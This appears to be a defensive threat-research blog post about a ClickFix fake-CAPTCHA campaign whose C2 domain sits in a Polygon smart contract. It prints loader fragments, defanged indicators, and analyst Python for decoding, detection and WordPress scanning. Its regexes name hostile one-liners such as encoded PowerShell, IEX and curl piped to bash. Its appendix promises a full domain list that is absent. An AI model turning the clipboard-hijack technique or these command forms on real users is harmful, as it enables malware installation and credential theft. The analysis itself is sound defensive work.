
ClickFix 2026: Fake CAPTCHA Hides C2 On-Chain


ClickFix 2026 cover: a fake "verify you are human" CAPTCHA box wired to a Polygon blockchain block holding the command-and-control domain.

A fake "verify you're human" CAPTCHA is now one of the most common ways malware reaches a desktop in 2026. The trick, known as ClickFix, never exploits a browser bug. It convinces the visitor to copy a hidden command and run it themselves, so the operating system only ever sees a person typing into their own shell. This investigation dissects a live ClickFix campaign that adds a distinctly 2026 twist: its command-and-control (C2) address is stored on the Polygon blockchain, a technique called EtherHiding, which makes the infrastructure almost impossible to take down.

The entry point was an ordinary hacked WooCommerce store. Loaded in a normal browser the site looked clean, because the malicious loader is cloaked and only fires for the right visitor. Behind it sits a professional ClickFix-as-a-service kit with swappable lure templates (fake reCAPTCHA, fake Cloudflare check, fake Blue Screen) and a Polygon smart contract that hands out the current attack domain on demand. Here is the full chain, the decoded payload, the indicators to block, and how to respond if a command has already been pasted.

Editor's note. The compromised site is anonymized as "the victim store": it is a real, legitimate business whose WordPress site was hacked, and naming it before remediation would expose its customers to further harm. All attacker infrastructure is defanged (superboomer[.]world). Do not open the live URLs in a normal browser. The entire point of the attack is to get you to paste a command.

At a glance
Technique: ClickFix / fake CAPTCHA, clipboard hijack, infostealer loader
Entry point: Compromised WordPress + WooCommerce site (cloaked JS injection)
Targets: Windows and macOS desktop users only (Linux, Android, iOS skipped)
Lures: Fake reCAPTCHA, fake Cloudflare "verify you are human," fake BSOD, fake browser update
C2 technique: EtherHiding (the current C2 domain is stored in a Polygon smart contract)
Resilience: Domain rotation with one on-chain transaction; no re-infection needed
Status: Active in 2026; 97 unique C2 domains across 113 on-chain rotations (Mar–Jun 2026)

What is ClickFix, and why 2026 is its breakout year

ClickFix flips the malware-delivery model on its head. Instead of exploiting software, it exploits the user. A web page shows a familiar-looking obstacle (a CAPTCHA, a Cloudflare check, a "fix this error" prompt) and walks the visitor through three "human verification" steps:

  1. Press Windows + R (or open Terminal on macOS).
  2. Press Ctrl + V; the page has already copied a command to the clipboard.
  3. Press Enter.

Those keystrokes run an attacker-supplied command, typically a hidden PowerShell or mshta one-liner that downloads and executes an infostealer (Lumma, StealC, or AMOS on macOS) or a loader. Because the victim runs the command, it sidesteps most browser and download protections: there is no malicious file to score and no signed bundle for Gatekeeper to quarantine. Through 2025 and into 2026, ClickFix became one of the most prevalent initial-access methods on the web, and the kits professionalized into ClickFix-as-a-service panels. The campaign below is one of them.

This is the same family as the macOS case we documented in ClickFix Drops Atomic Stealer via Fake DirBuster; what makes the 2026 variant different is everything behind the lure.

The case study: a hacked WooCommerce store

The victim store runs a standard stack: WordPress, WooCommerce, Astra/Elementor, on Hostinger/LiteSpeed. Loading the homepage as a normal desktop browser revealed nothing malicious. That is by design. The injected loader is cloaked: it builds its destination URL at runtime with String.fromCharCode() and injects a <script> element through document.createElement("script") only for targeted visitors, evading casual "view source" inspection and many automated scanners.

That selective behaviour is the hallmark of a Traffic Distribution System (TDS): server- and client-side logic that decides who sees the attack and who sees a clean page.

Anatomy of the attack chain

Compromised WordPress site
        │  (cloaked JS loader, built via fromCharCode)
        ▼
Reads C2 domain from Polygon smart contract  ◄── EtherHiding (the twist)
        │
        ▼
superboomer[.]world  (TDS — "Landing Analytics" panel)
        │  • log.php  → 1×1 tracking pixel (pageview telemetry, per victim site)
        │  • /api/?a=tds_cfg → targeting config
        ▼
OS check: Windows ✔  Mac ✔  Linux ✗  Android ✗  iOS ✗
        │
        ▼
Fake CAPTCHA landing page (titled "Terms of Service")
        │  • Hijacks navigator.clipboard.writeText
        │  • Decodes payload (base64 + XOR 0x83) → new Function()
        ▼
Clipboard poisoned with malicious command
        │  "Verify you're human: Win+R → Ctrl+V → Enter"
        ▼
Victim runs PowerShell / Terminal command → infostealer / loader

Stage 1: telemetry and targeting

The loader first beacons a tracking pixel and pulls a config:

  • hxxps://superboomer[.]world/log[.]php?t=pageview&src=<victim-site>&dv=desktop returns a 1×1 GIF, a classic analytics pixel that counts infections per compromised site.
  • hxxps://superboomer[.]world/api/?a=tds_cfg returns the targeting rules:
{ "enabled": true, "set_cookies": true,
  "show_windows": true, "show_mac": true,
  "show_linux": false, "show_android": false, "show_ios": false,
  "windows_landing": "/landing/windows.html",
  "mac_landing": "/landing/mac.html" }

Only Windows and macOS desktops are served the attack, because ClickFix "fixes" are OS-specific (PowerShell versus Terminal). Mobile and Linux visitors get nothing, which also reduces noise and sandbox detections.

Stage 2: the fake CAPTCHA and clipboard hijack

The landing page is disguised with the innocuous title "Terms of Service." Its core is a clipboard-poisoning routine:

// navigator.clipboard.writeText is overridden; copy events are intercepted
document.addEventListener('copy', function (e) {
  var s = window._lastClipData || '';
  try { var d = JSON.parse(s); if (d && d.token) s = d.token; } catch (e) {}
  // ... the malicious command is forced into the clipboard
});

The actual command is hidden in a base64 + single-byte XOR (key 0x83) blob and executed with new Function(). Decoding it reveals a full ClickFix-as-a-service kit ("BW" kit) with interchangeable lure templates:

Mode              File             Lure shown to victim
recaptcha         v3.js            Fake Google reCAPTCHA
cloudflare        v6.js            Fake Cloudflare "Verify you are human"
cf_update         v7.js            Fake Cloudflare browser update
bsod              v4.js            Fake Windows Blue Screen of Death
font / browser    v2.js / v1.js    Fake missing-font / browser update
mac_*             v8.js / v9.js    macOS reCAPTCHA / Cloudflare variants
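An analyst-side decoder for the obfuscation just described (base64, then single-byte XOR with 0x83), added here as an example; it is not code from the kit or from the original post. The sample blob is constructed from values quoted in this article, and the marker regexes are my assumptions about how a decoded loader is laid out:

```python
import base64
import re

XOR_KEY = 0x83  # single-byte key the article reports for this kit's payload blob


def decode_bw_blob(blob: str) -> str:
    """Reverse the loader's obfuscation: base64-decode, then XOR each byte with 0x83."""
    raw = base64.b64decode(blob)
    return bytes(b ^ XOR_KEY for b in raw).decode("utf-8", errors="replace")


def encode_bw_blob(text: str) -> str:
    """Forward direction of the same scheme; used here only to build the test sample."""
    return base64.b64encode(bytes(b ^ XOR_KEY for b in text.encode("utf-8"))).decode("ascii")


def extract_markers(script: str) -> dict:
    """Pull the triage indicators this article names out of decoded loader text
    (the regexes are assumptions about how such text is laid out)."""
    return {
        "mode_files": sorted(set(re.findall(r"\bv[1-9]\.js\b", script))),
        "rpc_hosts": sorted(set(re.findall(r"https://[A-Za-z0-9.\-]+", script))),
        "contracts": sorted(set(re.findall(r"0x[0-9a-fA-F]{40}", script))),
        "selectors": sorted(set(re.findall(r"FUNCTION_SELECTOR:\s*'([0-9a-fA-F]{8})'", script))),
        "init_flag": "__BW_SCRIPT_INITIALIZED__" in script,
    }


def triage(blob: str) -> dict:
    """Decode a captured blob and return its indicators in one step."""
    return extract_markers(decode_bw_blob(blob))


# Constructed sample standing in for a decoded loader, assembled from values quoted in the article.
SAMPLE_PLAIN = (
    "window.__BW_SCRIPT_INITIALIZED__ = true;"
    "const CONTRACT_CONFIG = {RPC_HOSTS: ['https://polygon.drpc.org', 'https://rpc.ankr.com/polygon'],"
    " CONTRACT_ADDRESS: '0x08207B087F61d7e95E441E15fd6d40BEfd6eD308', FUNCTION_SELECTOR: '38bcdc1c'};"
    "loadMode('recaptcha', 'v3.js');"
)
SAMPLE_BLOB = encode_bw_blob(SAMPLE_PLAIN)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_BLOB).items():
        print(f"{key}: {value}")
```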

Stage 3: EtherHiding, a command server you cannot delete

Here is what makes this campaign 2026-grade. Embedded in the decoded loader:

const CONTRACT_CONFIG = {
  RPC_HOSTS: [ "https://polygon.drpc.org",
               "https://polygon-bor-rpc.publicnode.com",
               "https://polygon.lava.build",
               "https://polygon.gateway.tenderly.co",
               "https://rpc.ankr.com/polygon" ],          // failover via Promise.any
  CONTRACT_ADDRESS: '0x08207B087F61d7e95E441E15fd6d40BEfd6eD308',
  FUNCTION_SELECTOR: '38bcdc1c'
};

The loader calls a smart contract on the Polygon blockchain to fetch its current C2 domain. We performed a read-only eth_call to that contract, and it returns the string:

superboomer[.]world

This is EtherHiding: storing attacker configuration in an immutable, censorship-resistant smart contract. The contract was deployed in March 2026, and we reconstructed its full history from the public ledger: 113 decoded Set URL updates rotating across 97 unique C2 domains (2026-03-11 to 2026-06-23), every one signed by the same operator wallet. The complete list is in the appendix below. In other words:

  • The domains are disposable. This one was registered the day before the attack.
  • The contract is permanent and acts as a rotating pointer.
  • Knock down superboomer[.]world, and the operator sends one transaction to point the contract at a new domain. Every compromised website worldwide updates instantly, with zero re-infection.
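The read-only lookup described above, as an added example and not the loader's own code: it builds the eth_call body for the quoted contract and selector, decodes the ABI-encoded string reply, and reduces scheme-and-path values (the form the early rotations in the appendix took) to a blockable hostname. The RPC reply is constructed offline so nothing is sent to a live endpoint, and the helper names are my own.

```python
import json

# Values quoted in the article (Polygon EtherHiding contract and its getter selector)
CONTRACT_ADDRESS = "0x08207B087F61d7e95E441E15fd6d40BEfd6eD308"
FUNCTION_SELECTOR = "38bcdc1c"
RPC_HOSTS = ["https://polygon.drpc.org", "https://polygon-bor-rpc.publicnode.com"]


def build_eth_call(contract: str, selector: str, rpc_id: int = 1) -> dict:
    """JSON-RPC body for a read-only eth_call: no wallet, no gas, nothing written on-chain."""
    return {
        "jsonrpc": "2.0",
        "id": rpc_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": "0x" + selector}, "latest"],
    }


def decode_abi_string(result_hex: str) -> str:
    """Decode a Solidity `string` return value: [offset][length][utf-8 bytes, zero-padded]."""
    data = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    offset = int.from_bytes(data[0:32], "big")
    length = int.from_bytes(data[offset:offset + 32], "big")
    return data[offset + 32:offset + 32 + length].decode("utf-8")


def encode_abi_string(value: str) -> str:
    """Inverse of decode_abi_string; used here only to construct a sample RPC reply."""
    raw = value.encode("utf-8")
    padded = raw + b"\x00" * (-len(raw) % 32)
    return "0x" + (32).to_bytes(32, "big").hex() + len(raw).to_bytes(32, "big").hex() + padded.hex()


def normalize_c2(value: str) -> str:
    """Reduce whatever the contract returns to a blockable hostname.

    Early rotations carried a scheme and path (e.g. https://sitepromclop.click/land/);
    later ones were bare domains. Both must map to the same host for blocking.
    """
    host = value.strip()
    if "://" in host:
        host = host.split("://", 1)[1]
    host = host.split("/", 1)[0].split(":", 1)[0]
    return host.lower().rstrip(".")


def defang(host: str) -> str:
    """Render a hostname safely for reports."""
    return host.replace(".", "[.]")


def current_c2_from_response(response: dict) -> str:
    """Given a parsed JSON-RPC reply, return the defanged C2 hostname it points to."""
    return defang(normalize_c2(decode_abi_string(response["result"])))


# Constructed sample reply, shaped like what a public RPC returns for the getter call.
SAMPLE_RESPONSE = {"jsonrpc": "2.0", "id": 1, "result": encode_abi_string("superboomer.world")}

if __name__ == "__main__":
    print(json.dumps(build_eth_call(CONTRACT_ADDRESS, FUNCTION_SELECTOR)))
    print("current C2:", current_c2_from_response(SAMPLE_RESPONSE))
```

Re-running the same call on a schedule and diffing the normalized hostname is the cheapest rotation-proof feed for this campaign, since the contract and selector do not change.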

Why ClickFix plus EtherHiding is so hard to take down

Traditional takedown is whack-a-mole against this architecture:

  • Suspending the domain raises the attacker's cost but is defeated by an on-chain Set URL.
  • The smart contract cannot be removed. It lives on a public blockchain.
  • The infection (the injected loader) persists on each hacked site until the owner cleans it.

The durable chokepoints are therefore: (1) cleaning the compromised websites, (2) flagging the blockchain contract and operator wallet with RPC providers and chain-abuse trackers, and (3) user awareness, because the final step always requires a human to paste a command. For the operational side of (1) and (2), see our walkthrough on how to take down a phishing website.

Indicators of compromise (IOCs)

Defanged for safety. The blockchain identifiers are rotation-proof, so prioritize those for detection.

Network / web

  • superboomer[.]world — TDS / C2 (Cloudflare-fronted; registrar Global Domain Group LLC; registered 2026-06-23)
  • hxxps://superboomer[.]world/log[.]php — pageview telemetry pixel
  • hxxps://superboomer[.]world/api/?a=tds_cfg — TDS config
  • hxxps://superboomer[.]world/api/index[.]php?q=… — encrypted payload (enc:q2)
  • hxxps://superboomer[.]world/landing/{windows,mac,linux}[.]html — fake-CAPTCHA pages
  • /admin/ path on the same host: the "Landing Analytics" operator panel (PHP)

Blockchain (durable)

  • C2 contract: 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308 (Polygon) · getter selector 0x38bcdc1c
  • Operator wallet: 0x34c15320d6e8f59f1b66f6c191aaa7f87b894b66
  • Rotated C2 domains: 97 unique over 113 on-chain updates (see the full list in the appendix)

Host / client artifacts

  • Loader markers: window.__BW_SCRIPT_INITIALIZED__, localStorage site_repair_state, bw-downloaded
  • Mode files: v1.js through v9.js
  • Obfuscation: base64 + XOR 0x83, executed via new Function(); URLs built with String.fromCharCode()

How to detect ClickFix (for defenders)

  • Clipboard-to-Run correlation: alert on explorer.exe spawning powershell.exe, mshta.exe, or wscript.exe shortly after browser clipboard activity. The Win+R RunMRU history is a goldmine.
  • EDR command-line hunting: hidden or encoded PowerShell (-w hidden, -enc, FromBase64String, IEX / Invoke-Expression), mshta http…, or curl … | bash on macOS.
  • Network: outbound calls to public Polygon RPCs from a browser process on a non-crypto endpoint are anomalous, and a strong EtherHiding signal.
  • Web / DRP monitoring: scan your own and customer sites for cloaked fromCharCode and createElement("script") injections and the markers above.
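The first and third hunts above as detection logic over constructed telemetry (an added example, not a vendor rule). The event field names (type, host, parent, image, cmdline, url) are assumptions standing in for whatever your EDR or Sysmon pipeline emits:

```python
import re
from urllib.parse import urlparse

SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Public Polygon RPC hosts from the loader's CONTRACT_CONFIG quoted in the article
POLYGON_RPC_HOSTS = {"polygon.drpc.org", "polygon-bor-rpc.publicnode.com", "polygon.lava.build",
                     "polygon.gateway.tenderly.co", "rpc.ankr.com"}
# Command-line traits the article lists for hidden or encoded ClickFix one-liners
SUSPICIOUS_CMD = re.compile(
    r"(-w(indow(style)?)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"
    r"|FromBase64String|\bIEX\b|Invoke-Expression|mshta(\.exe)?\s+https?://|curl\b.*\|\s*(ba)?sh)",
    re.IGNORECASE)


def detect_clipboard_to_run(events: list) -> list:
    """Flag explorer.exe (parent of anything launched from Win+R) spawning a script host
    with a ClickFix-looking command line."""
    alerts = []
    for ev in events:
        if ev.get("type") != "process_create":
            continue
        if ev["parent"].lower() != "explorer.exe" or ev["image"].lower() not in SHELLS:
            continue
        m = SUSPICIOUS_CMD.search(ev["cmdline"])
        if m:
            alerts.append({"host": ev["host"], "rule": "clickfix_run_box",
                           "image": ev["image"], "match": m.group(0)})
    return alerts


def detect_browser_rpc(events: list) -> list:
    """Flag a browser on an ordinary endpoint calling a public Polygon RPC (EtherHiding lookup)."""
    alerts = []
    for ev in events:
        if ev.get("type") != "net_conn" or ev["image"].lower() not in BROWSERS:
            continue
        host = (urlparse(ev["url"]).hostname or "").lower()
        if host in POLYGON_RPC_HOSTS:
            alerts.append({"host": ev["host"], "rule": "etherhiding_rpc_lookup",
                           "image": ev["image"], "match": host})
    return alerts


# Constructed telemetry (assumed field names): one ClickFix-shaped Run-box launch, one benign
# Run-box launch, one mshta from a different parent, one browser RPC call, one normal browse.
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS-017", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc UExBQ0VIT0xERVItTk9ULUEtUkVBTC1QQVlMT0FE"},  # placeholder blob
    {"type": "process_create", "host": "WS-017", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"type": "process_create", "host": "WS-022", "parent": "cmd.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Tools\\help.hta"},
    {"type": "net_conn", "host": "WS-017", "image": "chrome.exe", "url": "https://polygon.drpc.org/"},
    {"type": "net_conn", "host": "WS-031", "image": "chrome.exe", "url": "https://www.example.com/"},
]


def run_all(events: list) -> list:
    """Both hunts over one event stream; correlating the two on host is left to the SIEM."""
    return detect_clipboard_to_run(events) + detect_browser_rpc(events)
```

On the sample, both alerts land on WS-017 within the same stream, which is exactly the pairing (browser RPC lookup followed by a Run-box shell) that identifies this campaign rather than a generic encoded-PowerShell event.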

How to clean a hacked WordPress site

  1. Search wp-content/themes (header.php, footer.php, functions.php), mu-plugins, and the database (wp_posts, wp_options, wp_postmeta) for fromCharCode, createElement, atob, or base64 blobs that build a <script src>.
  2. Hunt for rogue admin users, recently modified PHP files, and malicious .htaccess rules, since the cloaking is often PHP-side.
  3. Rotate all credentials (WordPress, hosting, database, FTP), update core and plugins, and restore from a known-clean backup if possible.
  4. Scan with Wordfence, Sucuri, or Imunify and notify your host.
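A scanner for step 1 of the cleanup above (it also covers the web-monitoring bullet in the detection section), added as an example rather than any product's code: it walks a WordPress tree for the markers this article lists and decodes String.fromCharCode() calls so the cloaked destination URL becomes readable. The footer.php injection in the demo is constructed, and the function names are my own.

```python
import os
import re
import tempfile

# Strings the article names as injection and loader markers
MARKERS = ["String.fromCharCode", 'createElement("script")', "createElement('script')",
           "atob(", "__BW_SCRIPT_INITIALIZED__", "site_repair_state", "bw-downloaded"]
SCAN_EXT = {".php", ".js", ".html", ".sql"}
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([0-9,\s]+)\)")


def reveal_fromcharcode(js: str) -> list:
    """Decode every String.fromCharCode(n, n, ...) call so a cloaked URL becomes readable."""
    decoded = []
    for m in FROMCHARCODE.finditer(js):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def scan_text(text: str) -> dict:
    """Marker hits plus decoded fromCharCode strings for one file's contents."""
    return {"markers": [mk for mk in MARKERS if mk in text],
            "decoded": reveal_fromcharcode(text)}


def scan_tree(root: str) -> dict:
    """Walk themes, mu-plugins or a DB dump and report files that look injected."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name != ".htaccess" and os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = scan_text(fh.read())
            if result["markers"] or result["decoded"]:
                findings[os.path.relpath(path, root)] = result
    return findings


# Constructed sample: a cloaked loader of the shape the article describes, dropped into a
# theme footer. The hidden URL is the TDS config endpoint quoted in the article.
_URL = "https://superboomer.world/api/?a=tds_cfg"
SAMPLE_INJECTION = ("<?php wp_footer(); ?><script>var s=document.createElement('script');"
                    "s.src=String.fromCharCode(" + ",".join(str(ord(c)) for c in _URL) + ");"
                    "document.head.appendChild(s);</script>")


def demo_scan_tree() -> dict:
    """Build a throwaway theme dir with one clean and one injected file, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "astra")
        os.makedirs(theme)
        with open(os.path.join(theme, "header.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php wp_head(); ?>")
        with open(os.path.join(theme, "footer.php"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_INJECTION)
        return scan_tree(root)
```

Point scan_tree at wp-content (and at a wp_posts/wp_options dump exported as .sql) and review every hit by hand; a decoded URL you do not recognise is the loader.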

How to protect your users

  • Train the one reflex that defeats ClickFix: no legitimate website ever asks you to press Win+R or paste a command to "verify you're human." That instruction is the attack.
  • Consider blocking or monitoring Win+R and clipboard-to-shell behaviour through policy or EDR on managed endpoints.
  • Monitor your brand and your customers' domains for compromise so injections are caught before victims are.

Frequently asked questions

What is ClickFix? A social-engineering attack in which a fake CAPTCHA or error message tricks you into copying a hidden command and running it yourself (via Windows Run or a Mac Terminal), installing malware without any software exploit.

Is a fake CAPTCHA dangerous? Yes. A real CAPTCHA never asks you to open Run or Terminal or to paste anything. If a "verification" page gives keyboard instructions, close the tab immediately.

What is EtherHiding? A technique where attackers store malware configuration or C2 details inside a blockchain smart contract. Because the blockchain cannot be edited or removed by defenders, it gives the campaign takedown-resistant, instantly-rotatable infrastructure.

How do I know if I ran a ClickFix command? Check Windows Run history (RunMRU), PowerShell logs, and your downloads for unexpected scripts. If in doubt, disconnect, change passwords from a clean device, and run a reputable malware scan. Assume credentials and crypto wallets are compromised.

How do I remove ClickFix malware from my website? Find and delete the injected loader (see the WordPress cleanup steps above), rotate all credentials, update everything, and restore from a clean backup. The blockchain C2 cannot be removed, but cleaning your site stops it from serving the attack.

Conclusion

ClickFix in 2026 is no longer a crude prompt. It is a professional, OS-aware, blockchain-anchored delivery platform that turns ordinary visitors into the exploit and ordinary websites into the distribution network. Defeating it takes more than domain takedowns: clean the compromised sites, track the on-chain operator, and above all teach the reflex that real human verification never asks you to run a command.

Protect your brand and your customers from ClickFix and fake-CAPTCHA injections. PhishEye continuously monitors your domains for malicious injections, fake-CAPTCHA TDS infrastructure, and lookalike phishing, and automates takedowns across registrars, hosts, and browser blocklists.

Appendix: C2 domain rotation history

This is the full command-and-control rotation history for the campaign, reconstructed entirely from public Polygon blockchain data: the Set URL transactions of the EtherHiding C2 contract. No attacker systems were accessed. Because the contract and the operator wallet are immutable on-chain anchors, this feed is rotation-proof: the domains change, but the two addresses below do not.

  • EtherHiding C2 contract: 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308 (Polygon) · getter selector 0x38bcdc1c
  • Operator wallet (signs every rotation): 0x34c15320d6e8f59f1b66f6c191aaa7f87b894b66
  • Decoded Set URL updates: 113 · unique C2 domains: 97
  • Observed window: 2026-03-11 to 2026-06-23 · cadence: a new domain every 1 to 2 days, on cheap and abused TLDs

The first rotation pointed at https://cloudflare-check[.]cfd (2026-03-11); the latest at the time of writing is superboomer[.]world (2026-06-23), with a burst of same-day rotations on 2026-05-28. Every unique domain across that window is listed below. Block or retro-hunt all of them.


TLD footprint

.cfd (16) · .bond (15) · .lat (10) · .asia (9) · .xyz (7) · .lol (6) · .sbs (5) · .cyou (5) · .click (5) · .club (4) · .shop (4) · .in (2) · .world (1) · .rest (1) · .beer (1) · .digital (1) · .site (1) · .au (1) · .bond/land/ (1) · .click/land/ (1) · .sbs/ (1)


Threat research by the PhishEye team. IOCs are defanged in prose; the block-list above is plain text for tooling. The contract and operator wallet are the durable anchors: domains rotate, these do not. The victim site is anonymized pending remediation.